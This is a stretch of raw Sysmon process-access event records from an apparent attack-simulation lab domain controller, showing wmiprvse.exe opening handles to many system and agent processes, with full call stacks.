15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 